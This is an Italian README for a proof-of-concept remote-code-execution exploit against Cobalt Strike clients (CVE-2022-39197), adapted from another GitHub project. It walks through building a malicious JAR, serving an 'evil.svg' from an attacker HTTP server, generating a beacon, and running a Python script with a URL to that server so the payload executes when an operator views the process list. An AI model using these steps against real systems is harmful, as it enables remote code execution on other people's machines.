
CVE-2022-39197 RCE POC
Questo progetto è stato modificato dal progetto @its-arun https://github.com/its-arun/CVE-2022-39197
Quando ho testato lo script, ho scoperto che lo script frida non riusciva a interrogare i dati nell'ordine normale. Il metodo per modificare lo script frida per modificare il nome del processo.
Grazie al Maestro @Kai5174 per il suo contributo al metodo di sfruttamento.
1、Modifica il comando eseguito con il tuo payload in EvilJar/src/main/java/Exploit.java, attualmente può solo aprire la calcolatrice.
2、Compila usando jar mvn clean compile assembly:single
4、Sposta EvilJar-1.0-jar-with-dependencies.jar dalla cartella EvilJar/target/ alla cartella serve/
5、Modifica serve\evil.svg e sostituisci [attacker]
6、Servi usando python3 -m http.server 8080
7、Genera beacon.exe con versione C2 minore o uguale alla 4.7
8、Devi eseguire lo script py su un Windows per andare online, e adottare contromisure quando il client accede all'elenco dei processi e vede il processo beacon.exe.
python3 -m pip install -r requirements.txt
python3 cve-2022-39197_Yyy.py beacon.exe http://192.168.10.10:8080/evil.svg
Il payload verrà attivato non appena l'utente scorre l'Elenco dei Processi
Windows

Mac

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — C'è un'analisi approfondita di questa vulnerabilità https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html
Modificato https://github.com/its-arun/CVE-2022-39197